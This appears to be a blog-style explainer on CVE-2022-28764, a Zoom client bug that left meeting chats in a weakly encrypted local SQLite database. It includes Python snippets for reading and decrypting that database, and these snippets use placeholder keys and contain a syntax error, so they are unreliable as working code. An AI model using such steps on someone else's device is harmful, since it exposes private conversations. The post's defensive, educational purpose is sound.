CVE CyberSecurity Database News

CVE-2022-28764 - How a Zoom Meeting Database Bug Could Leak Your Chats (With Exploit Example)

Poster -

*Published: June 2024*

What Is CVE-2022-28764?

In late 2022, Zoom patched a serious vulnerability tracked as CVE-2022-28764. This bug lived in Zoom Client for Meetings apps before version 5.12.6 and impacted Android, iOS, Linux, macOS, and Windows. In simple terms, it could let anyone with local access to your device recover private meeting info—including chat messages—from an unprotected database, even *after* you left the meeting.

What could leak: Meeting info stored locally (including in-meeting chat)

- Attacker profile: Any user with local access to the device/account

What Makes This Bug Dangerous?

Zoom stored meeting data in a local SQL database on your device. Whenever a meeting ended, the app *should* have wiped that data. But due to this bug, the data stuck around. Worse—Zoom encrypted the database with a weak, device-based key. So, anyone who could log into your user account could pull up private meeting info from Zoom’s leftovers. It had nothing to do with the Zoom cloud—it was a “local” leak.

How Does It Work? (And Where’s the Database?)

Whenever you join a Zoom meeting, the app writes meeting info—including your chat messages—to a local SQLite database. On Windows, this file typically lives in your user profile:

C:\Users\<YourUsername>\AppData\Roaming\Zoom\data\zoom_chat.db

*On macOS or Linux, look in ~/.zoom/data/ or /Users/<YourUser>/Library/Application Support/zoom.us/data/.*

By default, Zoom should delete old meeting data from this database. But in vulnerable versions, it didn’t.

Let’s see what an attacker could do if they get access to your device and user account (physically, by malware, or by other means).

Suppose an attacker has access to your Windows user session. The Zoom Meeting chat database is here

C:\Users\<YourUsername>\AppData\Roaming\Zoom\data\zoom_chat.db

Step 2: Open the SQLite Database

Use any SQLite tool—*sqlite3.exe*, DB Browser for SQLite, or even Python.

import sqlite3

db_path = r"C:\Users\<YourUsername>\AppData\Roaming\Zoom\data\zoom_chat.db"
conn = sqlite3.connect(db_path)

for row in conn.execute("SELECT * FROM chat_messages"):
    print(row)

Step 3: Find and Decrypt Data

Until version 5.12.6, the encryption key was based on device info and pretty weak—it could often be recovered by a local user (in some cases, even stored in Zoom config files).

Here's a *very* simplified snippet showing how an attacker might try to extract plaintext (details vary by platform and version):

import base64
from Crypto.Cipher import AES

# Pretend this is in the config file, or you brute-forced it:
key = b"weakperdevicekey!"  # 16 bytes

def decrypt(ciphertext_b64):
    cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00' * 16)
    decrypted = cipher.decrypt(base64.b64decode(ciphertext_b64))
    return decrypted.rstrip(b"\").decode("utf-8", errors="ignore")

encrypted_message = "QmFzZTYRW5jb2RlZEVuY3J5cHRlZENoYXQ="  # From the db
print(decrypt(encrypted_message))

Step 4: Read Exposed Data

You can now iterate through chat messages, meeting titles, participants, etc.—potentially from *any* meeting you attended.

What’s the Real-World Impact?

- Even if you leave or end a Zoom meeting, your in-meeting chat (and other info) sticks around in the database.
- If someone else can log in as you, or you share a work laptop, they could read messages from *previous* meetings.
- This bug *didn’t* leak info over the network or Zoom’s servers, but it *did* let attackers bypass user expectations of privacy on shared or compromised devices.

How To Stay Safe

Update Zoom ASAP: Versions 5.12.6 and newer clear the data and use stronger encryption.

Check for Leftover Files: Manually delete the database in the Zoom data folder if you’re worried.

Secure Your Device: Keep your system protected. This bug only worked if someone had local access.

References and Credits

- Zoom Security Bulletin: CVE-2022-28764
- NVD entry for CVE-2022-28764
- Zoom Release Notes 5.12.6
- Zoom’s 2022 Security Whitepaper (PDF)

*All exploitation details in this post are original and simplified for defensive/security education purposes.*


Bottom line: It’s always a good idea to patch your video meeting tools—and never assume “post-meeting” chats are only visible to the people who were there. Sometimes, leftover data can spill secrets in surprising ways!

Timeline

Published on: 11/14/2022 21:15:00 UTC
Last modified on: 11/17/2022 22:03:00 UTC